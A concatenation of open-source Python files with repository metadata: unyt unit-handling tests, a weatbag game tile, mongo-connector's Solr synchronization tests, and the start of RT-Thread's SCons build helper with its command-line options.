assert repr(speed) == "pc/Myr"
assert str(dimensionless) == "dimensionless"
assert repr(dimensionless) == "(dimensionless)"
def test_multiplication():
"""
Multiply two units.
"""
msun_mks = mass_sun_kg
pc_mks = m_per_pc
# Create symbols
msun_sym = Symbol("Msun", positive=True)
pc_sym = Symbol("pc", positive=True)
s_sym = Symbol("s", positive=True)
# Create units
u1 = Unit("Msun")
u2 = Unit("pc")
# Mul operation
u3 = u1 * u2
assert u3.expr == msun_sym * pc_sym
assert_allclose_units(u3.base_value, msun_mks * pc_mks, 1e-12)
assert u3.dimensions == mass * length
# Pow and Mul operations
u4 = Unit("pc**2")
u5 = Unit("Msun * s")
u6 = u4 * u5
assert u6.expr == pc_sym**2 * msun_sym * s_sym
assert_allclose_units(u6.base_value, pc_mks**2 * msun_mks, 1e-12)
assert u6.dimensions == length**2 * mass * time
def test_division():
"""
Divide two units.
"""
pc_mks = m_per_pc
km_mks = m_per_km
# Create symbols
pc_sym = Symbol("pc", positive=True)
km_sym = Symbol("km", positive=True)
s_sym = Symbol("s", positive=True)
# Create units
u1 = Unit("pc")
u2 = Unit("km * s")
u3 = u1 / u2
assert u3.expr == pc_sym / (km_sym * s_sym)
assert_allclose_units(u3.base_value, pc_mks / km_mks, 1e-12)
assert u3.dimensions == 1 / time
def test_power():
"""
Take units to some power.
"""
from sympy import nsimplify
from unyt import dimensionless
pc_mks = m_per_pc
mK_mks = 1e-3
u1_dims = mass * length**2 * time**-3 * temperature**4
u1 = Unit("kg * pc**2 * s**-3 * mK**4")
u2 = u1**2
assert u2.dimensions == u1_dims**2
assert_allclose_units(u2.base_value, (pc_mks**2 * mK_mks**4) ** 2, 1e-12)
u3 = u1 ** (-1.0 / 3)
assert u3.dimensions == nsimplify(u1_dims ** (-1.0 / 3))
assert_allclose_units(
u3.base_value, (pc_mks**2 * mK_mks**4) ** (-1.0 / 3), 1e-12
)
assert u1**0.0 == dimensionless
def test_equality():
"""
Check unit equality with different symbols, but same dimensions and
base_value.
"""
u1 = Unit("km * s**-1")
u2 = Unit("m * ms**-1")
assert u1 == u2
assert u1.copy() == u2
def test_invalid_operations():
u1 = Unit("cm")
u2 = Unit("m")
with pytest.raises(InvalidUnitOperation):
u1 + u2
with pytest.raises(InvalidUnitOperation):
u1 += u2
with pytest.raises(InvalidUnitOperation):
1 + u1
with pytest.raises(InvalidUnitOperation):
u1 + 1
with pytest.raises(InvalidUnitOperation):
u1 - u2
with pytest.raises(InvalidUnitOperation):
u1 -= u2
with pytest.raises(InvalidUnitOperation):
1 - u1
with pytest.raises(InvalidUnitOperation):
u1 - 1
with pytest.raises(InvalidUnitOperation):
u1 *= u2
with pytest.raises(InvalidUnitOperation):
u1 * "hello!"
with pytest.raises(InvalidUnitOperation):
u1 /= u2
with pytest.raises(InvalidUnitOperation):
u1 / "hello!"
with pytest.raises(InvalidUnitOperation):
Unit("B") * Unit("V")
with pytest.raises(InvalidUnitOperation):
Unit("V") * Unit("B")
with pytest.raises(InvalidUnitOperation):
Unit("V") / Unit("Np")
with pytest.raises(InvalidUnitOperation):
Unit("dB") / Unit("dB")
with pytest.raises(InvalidUnitOperation):
Unit("B") ** 2
def test_base_equivalent():
"""
Check base equivalent of a unit.
"""
Msun_mks = mass_sun_kg
Mpc_mks = m_per_mpc
u1 = Unit("Msun * Mpc**-3")
u2 = Unit("kg * m**-3")
u3 = u1.get_base_equivalent()
assert u2.expr == u3.expr
assert u2 == u3
assert_allclose_units(u1.base_value, Msun_mks / Mpc_mks**3, 1e-12)
assert u2.base_value == 1
assert u3.base_value == 1
mass_density = mass / length**3
assert u1.dimensions == mass_density
assert u2.dimensions == mass_density
assert u3.dimensions == mass_density
assert_allclose_units(
u1.get_conversion_factor(u3)[0], Msun_mks / Mpc_mks**3, 1e-12
)
with pytest.raises(UnitConversionError):
u1.get_conversion_factor(Unit("m"))
with pytest.raises(UnitConversionError):
u1.get_conversion_factor(Unit("degF"))
reg = UnitRegistry(unit_system=cgs_unit_system)
u = Unit("kg", registry=reg)
assert u.get_base_equivalent() == Unit("g")
u = Unit("kg")
assert u.get_base_equivalent() == Unit("kg")
u = Unit("A")
assert u.get_base_equivalent(unit_system="mks") == Unit("A")
def test_temperature_offsets():
u1 = Unit("degC")
u2 = Unit("degF")
with pytest.raises(InvalidUnitOperation):
operator.mul(u1, u2)
with pytest.raises(InvalidUnitOperation):
operator.truediv(u1, u2)
def test_latex_repr():
registry = UnitRegistry()
# create a fake comoving unit
registry.add(
"pccm",
registry.lut["pc"][0] / (1 + 2),
length,
"\\rm{pc}/(1+z)",
prefixable=True,
)
test_unit = Unit("Mpccm", registry=registry)
assert_almost_equal(test_unit.base_value, m_per_mpc / 3)
assert_equal(test_unit.latex_repr, r"\rm{Mpc}/(1+z)")
test_unit = Unit("cm**-3", base_value=1.0, registry=registry)
assert_equal(test_unit.latex_repr, "\\frac{1}{\\rm{cm}^{3}}")
test_unit = Unit("m_geom/l_geom**3")
assert_equal(test_unit.latex_repr, "\\frac{1}{\\rm{M}_\\odot^{2}}")
test_unit = Unit("1e9*cm")
assert_equal(test_unit.latex_repr, "1.0 \\times 10^{9}\\ \\rm{cm}")
test_unit = Unit("1.0*cm")
assert_equal(test_unit.latex_repr, "\\rm{cm}")
def test_latitude_longitude():
lat = unit_symbols.lat
lon = unit_symbols.lon
deg = unit_symbols.deg
assert_equal(lat.units.base_offset, 90.0)
assert_equal((deg * 90.0).in_units("lat").value, 0.0)
assert_equal((deg * 180).in_units("lat").value, -90.0)
assert_equal((lat * 0.0).in_units("deg"), deg * 90.0)
assert_equal((lat * -90).in_units("deg"), deg * 180)
assert_equal(lon.units.base_offset, -180.0)
assert_equal((deg * 0.0).in_units("lon").value, -180.0)
assert_equal((deg * 90.0).in_units("lon").value, -90.0)
assert_equal((deg * 180).in_units("lon").value, 0.0)
assert_equal((deg * 360).in_units("lon").value, 180.0)
assert_equal((lon * -180.0).in_units("deg"), deg * 0.0)
assert_equal((lon * -90.0).in_units("deg"), deg * 90.0)
assert_equal((lon * 0.0).in_units("deg"), deg * 180.0)
assert_equal((lon * 180.0).in_units("deg"), deg * 360)
def test_creation_from_ytarray():
from unyt import electrostatic_unit, elementary_charge_cgs
u1 = Unit(electrostatic_unit)
assert_equal(str(u1), "statC")
assert_equal(u1, Unit("esu"))
assert_equal(u1, electrostatic_unit.units)
u2 = Unit(elementary_charge_cgs)
assert_equal(str(u2), "4.80320467299766e-10*statC")
assert_equal(u2, Unit("4.80320467299766e-10*statC"))
assert_equal(u1, elementary_charge_cgs.units)
assert_allclose((u1 / u2).base_value, electrostatic_unit / elementary_charge_cgs)
with pytest.raises(UnitParseError):
Unit([1, 2, 3] * elementary_charge_cgs)
def test_list_same_dimensions():
from unyt import m
reg = default_unit_registry
for equiv in reg.list_same_dimensions(m):
assert Unit(equiv).dimensions is length
def test_decagram():
dag = Unit("dag")
g = Unit("g")
assert dag.get_conversion_factor(g) == (10.0, None)
def test_pickle():
cm = Unit("cm")
assert cm == pickle.loads(pickle.dumps(cm))
def test_preserve_offset():
from unyt import degF, dimensionless
new_unit = degF * dimensionless
assert new_unit is not degF
assert new_unit == degF
assert new_unit.base_offset == degF.base_offset
new_unit = degF / dimensionless
assert new_unit is not degF
assert new_unit == degF
assert new_unit.base_offset == degF.base_offset
with pytest.raises(InvalidUnitOperation):
dimensionless / degF
def test_code_unit():
from unyt import UnitRegistry
ureg = UnitRegistry()
ureg.add("code_length", 10.0, length)
ureg.add("code_magnetic_field", 2.0, magnetic_field_mks)
u = Unit("code_length", registry=ureg)
assert u.is_code_unit is True
assert u.get_base_equivalent() == Unit("m")
u = Unit("cm")
assert u.is_code_unit is False
u = Unit("code_magnetic_field", registry=ureg)
assert u.get_base_equivalent("mks") == Unit("T")
with pytest.raises(UnitsNotReducible):
assert u.get_base_equivalent("cgs")
# see issue #60
u = Unit("s/m")
assert u.get_mks_equivalent() == Unit("s/m")
assert u.get_mks_equivalent() != Unit("ohm")
assert u.get_cgs_equivalent() == Unit("s/cm")
u = Unit("kC")
assert u.get_cgs_equivalent() == Unit("kesu")
assert u.get_cgs_equivalent().get_mks_equivalent() == u
UnitSystem(ureg.unit_system_id, "code_length", "kg", "s", registry=ureg)
u = Unit("cm", registry=ureg)
ue = u.get_base_equivalent("code")
assert str(ue) == "code_length"
assert ue.base_value == 10
assert ue.dimensions is length
class FakeDataset:
unit_registry = ureg
ds = FakeDataset()
UnitSystem(ds, "code_length", "kg", "s", registry=ureg)
u = Unit("cm", registry=ureg)
ue = u.get_base_equivalent(ds)
assert str(ue) == "code_length"
assert ue.base_value == 10
assert ue.dimensions is length
with pytest.raises(UnitParseError):
Unit("code_length")
def test_bad_equivalence():
from unyt import cm
with pytest.raises(KeyError):
cm.has_equivalent("dne")
def test_em_unit_base_equivalent():
from unyt import A, cm
with pytest.raises(UnitsNotReducible):
(A / cm).get_base_equivalent("cgs")
def test_symbol_lut_length():
for v in default_unit_symbol_lut.values():
assert len(v) == 5
def test_simplify():
import unyt as u
answers = {
u.Hz * u.s: "dimensionless",
u.kg / u.g: "1000",
u.Hz * u.s * u.km: "km",
u.kHz * u.s: "1000",
u.kHz * u.s * u.km: "1000*km",
u.kHz * u.s**2: "1000*s",
u.kHz * u.s**2 * u.km: "1000*km*s",
u.Hz**-1 * u.s: "s/Hz",
u.Hz**-1 * u.s * u.km: "km*s/Hz",
u.Hz**1.5 * u.s**1.7: "sqrt(Hz)*s**(7/10)",
u.Hz**1.5 * u.s**1.7 * u.km: "sqrt(Hz)*km*s**(7/10)",
u.m**2 / u.cm**2: "10000",
}
for unit, answer in answers.items():
assert str(unit.simplify()) == answer
def test_micro_prefix():
import unyt as u
# both versions of unicode mu work correctly
assert u.um == u.µm
assert u.um == u.μm
# parsing both versions works as well
assert u.ug == u.Unit("µg")
assert u.ug == u.Unit("μg")
def test_name_alternatives():
import unyt
from unyt._unit_lookup_table import (
default_unit_name_alternatives,
inv_name_alternatives,
name_alternatives,
)
# concatenated list of all alternative unit names
allowed_names = sum(name_alternatives.values(), [])
# ensure the values are all tuples and not e.g. strings
for val in default_unit_name_alternatives.values():
assert isinstance(val, tuple)
# all names are unique
assert len(set(allowed_names)) == len(allowed_names)
# each allowed name has a key in the inverse dict
assert len(inv_name_alternatives.keys()) == len(allowed_names)
assert set(inv_name_alternatives.keys()) == set(allowed_names)
for name in allowed_names:
assert hasattr(unyt, name)
assert hasattr(unyt.unit_symbols, name)
def test_solar_unit_name_alternatives():
import unyt
from unyt import Unit
# check that m_sun, m_Sun, M_sun, M_Sun, msun, and Msun all work
for lower_name_prefix in "mrltz":
base_name = lower_name_prefix + "sun"
for name_prefix in [lower_name_prefix, lower_name_prefix.upper()]:
alternative_names = [name_prefix + suf for suf in ["sun", "_sun", "_Sun"]]
for name in alternative_names:
assert Unit(name) == Unit(base_name)
assert hasattr(unyt, name)
# only solar mass units are in physical constants
if lower_name_prefix == "m":
assert hasattr(unyt.physical_constants, name)
def test_attosecond():
from unyt import Unit, attosecond, second
assert Unit("as") == attosecond
assert str(Unit("as")) == "as"
assert Unit("as/s") == attosecond / second
def test_micro():
from unyt import Unit
assert str(Unit("um")) == "μm"
assert str(Unit("us")) == "μs"
def test_show_all_units_doc_table_ops():
for name in set(name_alternatives.keys()):
u = Unit(name)
(1 * u).in_mks()
try:
(1 * u).in_cgs()
except UnitsNotReducible:
pass
def test_hPa_mbar():
assert Unit("hPa").dimensions == Unit("bar").dimensions
assert (5 * Unit("hPa") == 5 * Unit("mbar")).all()
assert (5 * Unit("hPa") != 1 * Unit("bar")).all()
def test_percent():
a = 300 * Unit("percent")
b = 3.0 * Unit("dimensionless")
c = 300.0 * Unit("%")
d = 300.0 * Unit("V*%/V")
assert a == b
assert str(a) == "300 %"
assert repr(a) == "unyt_quantity(300, '%')"
assert a == c
assert c == d
def test_equal_has_same_hash():
a = Unit("m")
b = Unit("m")
c = Unit("m*s/s")
assert a == b
assert b == c
assert hash(a) == hash(b)
assert hash(b) == hash(c)
def test_bel_neper():
assert Unit("B").dimensions == Unit("Np").dimensions
a = 1 * Unit("B") / (np.log(10) / 2)
assert_allclose_units(a.to("Np"), 1 * Unit("Np"))
a = 2 * Unit("B")
b = 20 * Unit("decibel")
assert (a == b).all()
c = 2 * Unit("Np")
d = 20 * Unit("decineper")
assert (c == d).all()
assert Unit("dB") ** 1 == Unit("dB")
def test_henry():
assert (Unit("H") / Unit("Ω")).dimensions == time
def test_degC():
assert Unit("degree_celsius") == Unit("degC")
assert Unit("degree_Celsius") == Unit("degC")
assert Unit("Celsius") == Unit("degC")
assert Unit("°C") == Unit("degC")
a = 1 * Unit("degC")
assert str(a) == "1 °C"
def test_degC_with_SIprefixes():
assert_allclose_units(1 * Unit("mdegC"), 0.001 * Unit("degC"))
assert_allclose_units(1 * Unit("degC"), 1000 * Unit("mdegC"))
assert_allclose_units(73 * Unit("degF"), 22777.779 * Unit("mdegC"))
assert_allclose_units(22777.779 * Unit("mdegC"), 73 * Unit("degF"))
assert_allclose_units(22777.779 * Unit("mdegC"), 532.67 * Unit("R"))
assert_allclose_units(1 * Unit("mK"), -273149.0 * Unit("mdegC"))
assert_allclose_units(1 * Unit("mdegC"), 273151.0 * Unit("mK"))
def test_delta_degC():
a = 1 * Unit("delta_degC")
assert str(a) == "1 Δ°C"
def test_degF():
assert Unit("degree_fahrenheit") == Unit("degF")
assert Unit("degree_Fahrenheit") == Unit("degF")
assert Unit("Fahrenheit") == Unit("degF")
assert Unit("°F") == Unit("degF")
a = 1 * Unit("degF")
assert str(a) == "1 °F"
def test_delta_degF():
a = 1 * Unit("delta_degF")
assert str(a) == "1 Δ°F"
def test_mixed_registry_operations():
reg = UnitRegistry(unit_system="cgs")
reg.add("fake_length", 0.001, length)
a = unyt_quantity(1, units="fake_length", registry=reg)
b = unyt_quantity(1, "cm")
assert_almost_equal(a + b, b + a)
assert_almost_equal(a - b, -(b - a))
assert_almost_equal(a * b, b * a)
assert_almost_equal(b / a, b / a.in_units("km"))
assert_almost_equal(a / b, a / b.in_units("km"))
| {
"content_hash": "66d59405b2ee635881a07adf43c62b65",
"timestamp": "",
"source": "github",
"line_count": 905,
"max_line_length": 88,
"avg_line_length": 26.029834254143648,
"alnum_prop": 0.5981236999617948,
"repo_name": "yt-project/unyt",
"id": "3ba67c508c857aaa0c10810e71f03cd24c3443b9",
"size": "23572",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "unyt/tests/test_units.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "463795"
},
{
"name": "TeX",
"bytes": "10958"
}
],
"symlink_target": ""
} |
from weatbag import words
class Tile:
def __init__(self):
self.first_visit = True
def describe(self):
if self.first_visit:
print("You are now on the island. The children are returning back "
"to the mainland with their raft.\n"
"In front of you there are some trees and a small path.\n"
"Feeling adventurous?\n")
self.first_visit = False
else:
print("The beach is quiet. Nothing seems to be going on.")
def action(self, player, do):
if do[0] in words.yes:
print("Awesome! Follow the path!")
elif do[0] in words.no:
print("You might be in the wrong place then. Pack your stuff and "
"quit the game.")
else:
print("Sorry, wat?!")
def leave(self, player, direction):
if direction == "e":
print("You can't go back by swimming, that part is full of "
"electric eels.")
return False
else:
return True
| {
"content_hash": "2012b207101cab6a7cd14ff562c8aa64",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 79,
"avg_line_length": 33.65625,
"alnum_prop": 0.532033426183844,
"repo_name": "takluyver/weatbag",
"id": "35897c3f40fe0bc3f2463b75e2ed0bb14cbee6ec",
"size": "1077",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "weatbag/tiles/n2w2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "63868"
}
],
"symlink_target": ""
} |
"""Test Solr search using the synchronizer, i.e. as it would be used by an user
"""
import logging
import os
import time
import sys
if sys.version_info[:2] == (2, 6):
import unittest2 as unittest
else:
import unittest
sys.path[0:0] = [""]
from pymongo import MongoClient
from tests import solr_pair, mongo_host, STRESS_COUNT
from tests.setup_cluster import (start_replica_set,
kill_replica_set,
restart_mongo_proc,
kill_mongo_proc)
from tests.util import assert_soon
from pysolr import Solr, SolrError
from mongo_connector.connector import Connector
from mongo_connector.util import retry_until_ok
from pymongo.errors import OperationFailure, AutoReconnect
class TestSynchronizer(unittest.TestCase):
""" Tests Solr
"""
@classmethod
def setUpClass(cls):
_, cls.secondary_p, cls.primary_p = start_replica_set('test-solr')
cls.conn = MongoClient(mongo_host, cls.primary_p,
replicaSet='test-solr')
cls.solr_conn = Solr('http://%s/solr' % solr_pair)
cls.solr_conn.delete(q='*:*')
@classmethod
def tearDownClass(cls):
""" Kills cluster instance
"""
kill_replica_set('test-solr')
def setUp(self):
try:
os.unlink("config.txt")
except OSError:
pass
open("config.txt", "w").close()
self.connector = Connector(
address='%s:%s' % (mongo_host, self.primary_p),
oplog_checkpoint='config.txt',
target_url='http://localhost:8983/solr',
ns_set=['test.test'],
u_key='_id',
auth_key=None,
doc_manager='mongo_connector/doc_managers/solr_doc_manager.py',
auto_commit_interval=0
)
self.connector.start()
assert_soon(lambda: len(self.connector.shard_set) > 0)
retry_until_ok(self.conn.test.test.remove)
assert_soon(lambda: len(self.solr_conn.search('*:*')) == 0)
def tearDown(self):
self.connector.join()
def test_shard_length(self):
"""Tests the shard_length to see if the shard set was recognized
"""
self.assertEqual(len(self.connector.shard_set), 1)
def test_insert(self):
"""Tests insert
"""
self.conn['test']['test'].insert({'name': 'paulie'})
while (len(self.solr_conn.search('*:*')) == 0):
time.sleep(1)
result_set_1 = self.solr_conn.search('paulie')
self.assertEqual(len(result_set_1), 1)
result_set_2 = self.conn['test']['test'].find_one()
for item in result_set_1:
self.assertEqual(item['_id'], str(result_set_2['_id']))
self.assertEqual(item['name'], result_set_2['name'])
def test_remove(self):
"""Tests remove
"""
self.conn['test']['test'].insert({'name': 'paulie'})
assert_soon(lambda: len(self.solr_conn.search("*:*")) == 1)
self.conn['test']['test'].remove({'name': 'paulie'})
assert_soon(lambda: len(self.solr_conn.search("*:*")) == 0)
def test_rollback(self):
"""Tests rollback. We force a rollback by inserting one doc, killing
primary, adding another doc, killing the new primary, and
restarting both the servers.
"""
primary_conn = MongoClient(mongo_host, self.primary_p)
self.conn['test']['test'].insert({'name': 'paul'})
while self.conn['test']['test'].find({'name': 'paul'}).count() != 1:
time.sleep(1)
while len(self.solr_conn.search('*:*')) != 1:
time.sleep(1)
kill_mongo_proc(self.primary_p, destroy=False)
new_primary_conn = MongoClient(mongo_host, self.secondary_p)
admin_db = new_primary_conn['admin']
while admin_db.command("isMaster")['ismaster'] is False:
time.sleep(1)
time.sleep(5)
retry_until_ok(self.conn.test.test.insert,
{'name': 'pauline'})
while (len(self.solr_conn.search('*:*')) != 2):
time.sleep(1)
result_set_1 = self.solr_conn.search('pauline')
result_set_2 = self.conn['test']['test'].find_one({'name': 'pauline'})
self.assertEqual(len(result_set_1), 1)
for item in result_set_1:
self.assertEqual(item['_id'], str(result_set_2['_id']))
kill_mongo_proc(self.secondary_p, destroy=False)
restart_mongo_proc(self.primary_p)
while primary_conn['admin'].command("isMaster")['ismaster'] is False:
time.sleep(1)
restart_mongo_proc(self.secondary_p)
time.sleep(2)
result_set_1 = self.solr_conn.search('pauline')
self.assertEqual(len(result_set_1), 0)
result_set_2 = self.solr_conn.search('paul')
self.assertEqual(len(result_set_2), 1)
def test_stress(self):
"""Test stress by inserting and removing a large amount of docs.
"""
#stress test
for i in range(0, STRESS_COUNT):
self.conn['test']['test'].insert({'name': 'Paul ' + str(i)})
time.sleep(5)
while (len(self.solr_conn.search('*:*', rows=STRESS_COUNT))
!= STRESS_COUNT):
time.sleep(5)
for i in range(0, STRESS_COUNT):
result_set_1 = self.solr_conn.search('Paul ' + str(i))
for item in result_set_1:
self.assertEqual(item['_id'], item['_id'])
def test_stressed_rollback(self):
"""Test stressed rollback with a large number of documents"""
for i in range(0, STRESS_COUNT):
self.conn['test']['test'].insert(
{'name': 'Paul ' + str(i)})
while (len(self.solr_conn.search('*:*', rows=STRESS_COUNT))
!= STRESS_COUNT):
time.sleep(1)
primary_conn = MongoClient(mongo_host, self.primary_p)
kill_mongo_proc(self.primary_p, destroy=False)
new_primary_conn = MongoClient(mongo_host, self.secondary_p)
admin_db = new_primary_conn['admin']
while admin_db.command("isMaster")['ismaster'] is False:
time.sleep(1)
time.sleep(5)
count = -1
while count + 1 < STRESS_COUNT:
try:
count += 1
self.conn['test']['test'].insert(
{'name': 'Pauline ' + str(count)})
except (OperationFailure, AutoReconnect):
time.sleep(1)
while (len(self.solr_conn.search('*:*', rows=STRESS_COUNT * 2)) !=
self.conn['test']['test'].find().count()):
time.sleep(1)
result_set_1 = self.solr_conn.search(
'Pauline',
rows=STRESS_COUNT * 2, sort='_id asc'
)
for item in result_set_1:
result_set_2 = self.conn['test']['test'].find_one(
{'name': item['name']})
self.assertEqual(item['_id'], str(result_set_2['_id']))
kill_mongo_proc(self.secondary_p, destroy=False)
restart_mongo_proc(self.primary_p)
while primary_conn['admin'].command("isMaster")['ismaster'] is False:
time.sleep(1)
restart_mongo_proc(self.secondary_p)
while (len(self.solr_conn.search(
'Pauline',
rows=STRESS_COUNT * 2)) != 0):
time.sleep(15)
result_set_1 = self.solr_conn.search(
'Pauline',
rows=STRESS_COUNT * 2
)
self.assertEqual(len(result_set_1), 0)
result_set_2 = self.solr_conn.search(
'Paul',
rows=STRESS_COUNT * 2
)
self.assertEqual(len(result_set_2), STRESS_COUNT)
def test_valid_fields(self):
""" Tests documents with field definitions
"""
inserted_obj = self.conn['test']['test'].insert(
{'name': 'test_valid'})
self.conn['test']['test'].update(
{'_id': inserted_obj},
{'$set': {'popularity': 1}}
)
docman = self.connector.doc_managers[0]
for _ in range(60):
if len(docman._search("*:*")) != 0:
break
time.sleep(1)
else:
self.fail("Timeout when removing docs from Solr")
result = docman.get_last_doc()
self.assertIn('popularity', result)
self.assertEqual(len(docman._search(
"name=test_valid")), 1)
def test_invalid_fields(self):
""" Tests documents without field definitions
"""
inserted_obj = self.conn['test']['test'].insert(
{'name': 'test_invalid'})
self.conn['test']['test'].update(
{'_id': inserted_obj},
{'$set': {'break_this_test': 1}}
)
docman = self.connector.doc_managers[0]
for _ in range(60):
if len(docman._search("*:*")) != 0:
break
time.sleep(1)
else:
self.fail("Timeout when removing docs from Solr")
result = docman.get_last_doc()
self.assertNotIn('break_this_test', result)
self.assertEqual(len(docman._search(
"name=test_invalid")), 1)
def test_dynamic_fields(self):
""" Tests dynamic field definitions
The following fields are supplied in the provided schema.xml:
<dynamicField name="*_i" type="int" indexed="true" stored="true"/>
<dynamicField name="i_*" type="int" indexed="true" stored="true"/>
Cases:
1. Match on first definition
2. Match on second definition
3. No match
"""
self.solr_conn.delete(q='*:*')
match_first = {"_id": 0, "foo_i": 100}
match_second = {"_id": 1, "i_foo": 200}
match_none = {"_id": 2, "foo": 300}
# Connector is already running
self.conn["test"]["test"].insert(match_first)
self.conn["test"]["test"].insert(match_second)
self.conn["test"]["test"].insert(match_none)
# Should have documents in Solr now
assert_soon(lambda: len(self.solr_conn.search("*:*")) > 0,
"Solr doc manager should allow dynamic fields")
# foo_i and i_foo should be indexed, foo field should not exist
self.assertEqual(len(self.solr_conn.search("foo_i:100")), 1)
self.assertEqual(len(self.solr_conn.search("i_foo:200")), 1)
# SolrError: "undefined field foo"
logger = logging.getLogger("pysolr")
logger.error("You should see an ERROR log message from pysolr here. "
"This indicates success, not an error in the test.")
with self.assertRaises(SolrError):
self.solr_conn.search("foo:300")
def test_nested_fields(self):
"""Test indexing fields that are sub-documents in MongoDB
The following fields are defined in the provided schema.xml:
<field name="person.address.street" type="string" ... />
<field name="person.address.state" type="string" ... />
<dynamicField name="numbers.*" type="string" ... />
<dynamicField name="characters.*" type="string" ... />
"""
# Connector is already running
self.conn["test"]["test"].insert({
"name": "Jeb",
"billing": {
"address": {
"street": "12345 Mariposa Street",
"state": "California"
}
}
})
self.conn["test"]["test"].insert({
"numbers": ["one", "two", "three"],
"characters": [
{"name": "Big Bird",
"color": "yellow"},
{"name": "Elmo",
"color": "red"},
"Cookie Monster"
]
})
assert_soon(lambda: len(self.solr_conn.search("*:*")) > 0,
"documents should have been replicated to Solr")
# Search for first document
results = self.solr_conn.search(
"billing.address.street:12345\ Mariposa\ Street")
self.assertEqual(len(results), 1)
self.assertEqual(next(iter(results))["billing.address.state"],
"California")
# Search for second document
results = self.solr_conn.search(
"characters.1.color:red")
self.assertEqual(len(results), 1)
self.assertEqual(next(iter(results))["numbers.2"], "three")
results = self.solr_conn.search("characters.2:Cookie\ Monster")
self.assertEqual(len(results), 1)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "a89883ab1cc1bb4f34ecec02099f9e05",
"timestamp": "",
"source": "github",
"line_count": 358,
"max_line_length": 79,
"avg_line_length": 35.29608938547486,
"alnum_prop": 0.5450300728078505,
"repo_name": "wowgeeker/mongo-connector",
"id": "381bcf7b5ab26936af6b4adb5dc747de11856352",
"size": "13215",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tests/test_solr.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import os
import sys
import string
import utils
from SCons.Script import *
from utils import _make_path_relative
from mkdist import do_copy_file
BuildOptions = {}
Projects = []
Rtt_Root = ''
Env = None
# SCons PreProcessor patch
def start_handling_includes(self, t=None):
"""
Causes the PreProcessor object to start processing #import,
#include and #include_next lines.
This method will be called when a #if, #ifdef, #ifndef or #elif
evaluates True, or when we reach the #else in a #if, #ifdef,
#ifndef or #elif block where a condition already evaluated
False.
"""
d = self.dispatch_table
p = self.stack[-1] if self.stack else self.default_table
for k in ('import', 'include', 'include_next', 'define'):
d[k] = p[k]
def stop_handling_includes(self, t=None):
"""
Causes the PreProcessor object to stop processing #import,
#include and #include_next lines.
This method will be called when a #if, #ifdef, #ifndef or #elif
evaluates False, or when we reach the #else in a #if, #ifdef,
#ifndef or #elif block where a condition already evaluated True.
"""
d = self.dispatch_table
d['import'] = self.do_nothing
d['include'] = self.do_nothing
d['include_next'] = self.do_nothing
d['define'] = self.do_nothing
PatchedPreProcessor = SCons.cpp.PreProcessor
PatchedPreProcessor.start_handling_includes = start_handling_includes
PatchedPreProcessor.stop_handling_includes = stop_handling_includes
class Win32Spawn:
def spawn(self, sh, escape, cmd, args, env):
# deal with the cmd build-in commands which cannot be used in
# subprocess.Popen
if cmd == 'del':
for f in args[1:]:
try:
os.remove(f)
except Exception as e:
print ('Error removing file: ' + e)
return -1
return 0
import subprocess
newargs = ' '.join(args[1:])
cmdline = cmd + " " + newargs
# Make sure the env is constructed by strings
_e = dict([(k, str(v)) for k, v in env.items()])
# Windows(tm) CreateProcess does not use the env passed to it to find
# the executables. So we have to modify our own PATH to make Popen
# work.
old_path = os.environ['PATH']
os.environ['PATH'] = _e['PATH']
try:
proc = subprocess.Popen(cmdline, env=_e, shell=False)
except Exception as e:
print ('Error in calling command:' + cmdline.split(' ')[0])
print ('Exception: ' + os.strerror(e.errno))
if (os.strerror(e.errno) == "No such file or directory"):
print ("\nPlease check Toolchains PATH setting.\n")
return e.errno
finally:
os.environ['PATH'] = old_path
return proc.wait()
# generate cconfig.h file
def GenCconfigFile(env, BuildOptions):
import rtconfig
if rtconfig.PLATFORM == 'gcc':
contents = ''
if not os.path.isfile('cconfig.h'):
import gcc
gcc.GenerateGCCConfig(rtconfig)
# try again
if os.path.isfile('cconfig.h'):
f = open('cconfig.h', 'r')
if f:
contents = f.read()
f.close()
prep = PatchedPreProcessor()
prep.process_contents(contents)
options = prep.cpp_namespace
BuildOptions.update(options)
# add HAVE_CCONFIG_H definition
env.AppendUnique(CPPDEFINES = ['HAVE_CCONFIG_H'])
def PrepareBuilding(env, root_directory, has_libcpu=False, remove_components = []):
import rtconfig
global BuildOptions
global Projects
global Env
global Rtt_Root
# ===== Add option to SCons =====
AddOption('--dist',
dest = 'make-dist',
action = 'store_true',
default = False,
help = 'make distribution')
AddOption('--dist-strip',
dest = 'make-dist-strip',
action = 'store_true',
default = False,
help = 'make distribution and strip useless files')
AddOption('--dist-ide',
dest = 'make-dist-ide',
action = 'store_true',
default = False,
help = 'make distribution for RT-Thread Studio IDE')
AddOption('--project-path',
dest = 'project-path',
type = 'string',
default = None,
help = 'set dist-ide project output path')
AddOption('--project-name',
dest = 'project-name',
type = 'string',
default = None,
help = 'set project name')
AddOption('--reset-project-config',
dest = 'reset-project-config',
action = 'store_true',
default = False,
help = 'reset the project configurations to default')
AddOption('--cscope',
dest = 'cscope',
action = 'store_true',
default = False,
help = 'Build Cscope cross reference database. Requires cscope installed.')
AddOption('--clang-analyzer',
dest = 'clang-analyzer',
action = 'store_true',
default = False,
help = 'Perform static analyze with Clang-analyzer. ' + \
'Requires Clang installed.\n' + \
'It is recommended to use with scan-build like this:\n' + \
'`scan-build scons --clang-analyzer`\n' + \
'If things goes well, scan-build will instruct you to invoke scan-view.')
AddOption('--buildlib',
dest = 'buildlib',
type = 'string',
help = 'building library of a component')
AddOption('--cleanlib',
dest = 'cleanlib',
action = 'store_true',
default = False,
help = 'clean up the library by --buildlib')
AddOption('--target',
dest = 'target',
type = 'string',
help = 'set target project: mdk/mdk4/mdk5/iar/vs/vsc/ua/cdk/ses/makefile/eclipse')
AddOption('--genconfig',
dest = 'genconfig',
action = 'store_true',
default = False,
help = 'Generate .config from rtconfig.h')
AddOption('--useconfig',
dest = 'useconfig',
type = 'string',
help = 'make rtconfig.h from config file.')
AddOption('--verbose',
dest = 'verbose',
action = 'store_true',
default = False,
help = 'print verbose information during build')
Env = env
Rtt_Root = os.path.abspath(root_directory)
